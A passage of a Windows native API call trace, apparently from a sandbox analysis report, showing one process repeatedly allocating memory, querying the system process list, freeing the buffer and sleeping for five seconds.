RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.914] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.930] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.946] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.961] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.977] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0133.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0133.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0133.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0133.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0133.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0133.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0133.994] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.009] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.024] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.040] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.055] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.072] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.086] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.119] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.134] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.149] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.164] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.180] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.195] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.211] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.227] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.242] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.258] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 